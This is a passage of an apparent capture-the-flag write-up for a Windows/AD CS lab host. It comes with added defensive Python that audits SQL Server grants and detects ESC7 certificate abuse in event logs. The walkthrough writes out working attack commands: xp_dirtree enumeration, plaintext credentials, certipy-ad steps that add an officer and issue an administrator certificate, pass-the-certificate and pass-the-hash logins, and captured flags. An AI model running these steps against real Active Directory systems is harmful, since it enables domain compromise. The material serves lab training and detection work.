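UNC_CAPABLE = {"xp_dirtree", "xp_subdirs", "xp_fileexist"}
# Roles every login belongs to; a grant here is effectively a grant to everyone.
BROAD_PRINCIPALS = {"public", "guest"}


def effective_execute(rows, obj):
    """Principals that can effectively EXECUTE obj: grants (incl. Grant_WGO) minus denies."""
    granted = {r.grantee for r in rows
               if r.obj == obj and r.action == "Execute" and r.protect_type.startswith("Grant")}
    denied = {r.grantee for r in rows
              if r.obj == obj and r.action == "Execute" and r.protect_type == "Deny"}
    return granted - denied


def find_exposed(rows):
    """Map each UNC-capable procedure to the broad principals that can still run it."""
    exposed = {}
    for obj in sorted({r.obj for r in rows} & UNC_CAPABLE):
        broad = effective_execute(rows, obj) & BROAD_PRINCIPALS
        if broad:
            exposed[obj] = sorted(broad)
    return exposed


def remediation_sql(exposed):
    """T-SQL statements that remove the broad grants found by find_exposed."""
    statements = ["USE master;"]
    for obj, principals in sorted(exposed.items()):
        for principal in principals:
            statements.append(f"REVOKE EXECUTE ON [{obj}] FROM [{principal}];")
    return statements


if __name__ == "__main__":
    for line in remediation_sql(find_exposed(SAMPLE_ROWS)):
        print(line)
```

Members of sysadmin bypass these grants, so the REVOKE only removes the low-privilege path; pair it with egress filtering of TCP 445 from the SQL host and a service account that holds no privileges worth relaying, which is what actually limits the damage of a coerced authentication.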


Use xp_dirtree to list the default Windows web root:

xp_dirtree 'C:\inetpub\wwwroot',1 ,1 ;
SQL> xp_dirtree 'C:\inetpub\wwwroot',1 ,1 ;
subdirectory                      depth   file
-------------------------------   -----   ----
about.html                            1      1
contact.html                          1      1
css                                   1      0
images                                1      0
index.html                            1      1
js                                    1      0
service.html                          1      1
web.config                            1      1
website-backup-27-07-23-old.zip       1      1

Download the archive, extract it, and grep recursively for strings containing "password":

grep -r "password" ./


cat .old-conf.xml


raven
R4v3nBe5tD3veloP3r!123

Log in with evil-winrm and grab the user flag:

evil-winrm -i 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123'
cd ../desktop
type user.txt
fa7bf04cf53ecea2a3070f8c1f777ac9
whoami /all


The user is a member of the Certificate Service DCOM Access group.

Use certipy-ad to check for vulnerable certificate configurations:

certipy-ad find -vulnerable -stdout -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236


ESC7 is when a user has the Manage CA or Manage Certificates access right on a CA. There is no public technique that abuses the Manage Certificates right alone for domain privilege escalation, but it can be used to issue or deny pending certificate requests.

With Manage CA, add our user as a new officer to grant ourselves the Manage Certificates access right:

certipy-ad ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'


The -enable-template parameter enables the SubCA template on the CA:

certipy-ad ca -ca 'manager-DC01-CA' -enable-template SubCA -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123'


First request a certificate based on the SubCA template. The request will be denied, but we save the private key and note the request ID:

certipy-ad req -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -template SubCA -upn 'administrator@manager.htb'


With Manage CA and Manage Certificates, issue the failed request using the ca command and the -issue-request <request ID> parameter:

certipy-ad ca -ca 'manager-DC01-CA' -issue-request 16 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'


Finally, retrieve the issued certificate with the req command and the -retrieve <request ID> parameter:

certipy-ad req -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -retrieve 16


Authenticate with the certificate (pass-the-certificate, PTC) to obtain the administrator's NT hash:

certipy-ad auth -pfx administrator.pfx -username administrator -domain manager.htb -dc-ip 10.10.11.236
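The chain just walked (officer added, request denied, the same request ID issued shortly afterwards with a UPN belonging to someone else) leaves a distinctive sequence in the CA's Security log once AD CS auditing is enabled: 4882 (CA security permissions changed), 4888 (request denied) and 4887 (request approved and certificate issued). The Python below is an added example, not code from the writeup or from certipy, that correlates constructed events of those three types. The field names ("actor", "requester", "san_upn") are simplified assumptions standing in for the events' XML data, and the timestamps and request IDs are constructed.

```python
"""Correlate AD CS Security events to surface the ESC7 chain used above:
CA security descriptor changed (4882) -> request denied (4888) -> the same
request ID issued (4887) with a SAN UPN that does not belong to the requester.

Added example, not part of the original writeup. EVENTS is constructed and the
field names are a simplified view of the events' XML data; map them onto the
real fields before running this against live logs.
"""
from collections import defaultdict
from datetime import datetime, timedelta

CA = "manager-DC01-CA"
EVENTS = [  # constructed sample log
    {"time": "2024-01-10T14:01:00", "id": 4882, "ca": CA, "actor": "MANAGER\\raven"},
    {"time": "2024-01-10T14:02:10", "id": 4888, "ca": CA, "request_id": 16,
     "requester": "MANAGER\\raven", "template": "SubCA"},
    {"time": "2024-01-10T14:03:05", "id": 4887, "ca": CA, "request_id": 16,
     "requester": "MANAGER\\raven", "template": "SubCA", "san_upn": "administrator@manager.htb"},
    # benign: machine certificate with no UPN in the SAN
    {"time": "2024-01-10T14:10:00", "id": 4887, "ca": CA, "request_id": 17,
     "requester": "MANAGER\\DC01$", "template": "Machine", "san_upn": None},
    # benign: user certificate whose UPN matches the requester
    {"time": "2024-01-10T15:30:00", "id": 4887, "ca": CA, "request_id": 18,
     "requester": "MANAGER\\ryan", "template": "User", "san_upn": "ryan@manager.htb"},
]

REASON_DENIED_THEN_ISSUED = "request was denied earlier, then issued"
REASON_UPN_MISMATCH = "SAN UPN does not belong to the requester"
REASON_SELF_GRANTED_PERMS = "requester changed CA security permissions shortly before"


def upn_belongs_to(requester, upn):
    """True when the UPN names the requester (or the certificate carries no UPN)."""
    if not upn:
        return True
    sam = requester.split("\\")[-1].rstrip("$").lower()
    return upn.split("@")[0].lower() == sam


def find_esc7(events, window=timedelta(hours=1)):
    """One finding per issued certificate (4887) that matches at least one ESC7
    indicator within `window`; `reasons` lists which indicators matched."""
    denied = defaultdict(list)          # (ca, request_id) -> denial times
    perm_changes = []                   # (time, actor) from 4882
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4882:
            perm_changes.append((t, ev["actor"].lower()))
        elif ev["id"] == 4888:
            denied[(ev["ca"], ev["request_id"])].append(t)
        elif ev["id"] == 4887:
            reasons = []
            if any(timedelta(0) <= t - d <= window
                   for d in denied.get((ev["ca"], ev["request_id"]), [])):
                reasons.append(REASON_DENIED_THEN_ISSUED)
            if not upn_belongs_to(ev["requester"], ev.get("san_upn")):
                reasons.append(REASON_UPN_MISMATCH)
            # the tell-tale ESC7 shape: the same principal edits CA permissions, then gets a cert
            if any(timedelta(0) <= t - pt <= window and actor == ev["requester"].lower()
                   for pt, actor in perm_changes):
                reasons.append(REASON_SELF_GRANTED_PERMS)
            if reasons:
                findings.append({"ca": ev["ca"], "request_id": ev["request_id"],
                                 "requester": ev["requester"], "template": ev["template"],
                                 "time": ev["time"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_esc7(EVENTS):
        print(finding)
```

These events are only written when the "Audit Certification Services" subcategory is enabled and the CA's own audit filter includes request and security-change events; the UPN-mismatch indicator on its own is also the signal for ESC1-style abuse, so it is worth alerting on even without the other two.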

If this errors out, set up a Python virtual environment (install venv first if it is missing):

python -m venv /home/kali/name
source /home/kali/name/bin/activate


If this errors out, synchronise your clock with the server (the scan above reported a clock skew of about 7 hours, which Kerberos will not tolerate):

rdate -n 10.10.11.236


Keep re-running the last command until the hash appears:


aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef

Use evil-winrm with the hash (pass-the-hash) to log in as administrator and grab the root flag:

evil-winrm -i 10.10.11.236 -u administrator -H 'ae5064c2f62317332c88629e025924ef'


6281dcd0ecc5c42a28d94eea077254f7